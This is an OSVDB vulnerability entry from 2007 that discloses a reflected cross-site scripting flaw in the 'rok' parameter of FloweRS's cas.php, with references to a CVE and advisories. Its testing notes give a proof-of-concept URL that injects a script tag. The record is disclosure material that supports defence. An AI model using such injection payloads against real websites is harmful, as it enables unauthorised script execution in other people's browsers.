FloweRS cas.php rok Variable XSS

2007-04-14T15:53:54
ID OSVDB:35354
Type osvdb
Reporter OSVDB
Modified 2007-04-14T15:53:54

Description

Manual Testing Notes

http://[target]/[path]/cas.php?rok=<script>alert(/the_Edit0r/);</script>

References:

Vendor URL: http://sourceforge.net/projects/flowers/ Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0220.html FrSIRT Advisory: ADV-2007-1402 CVE-2007-2308 Bugtraq ID: 23488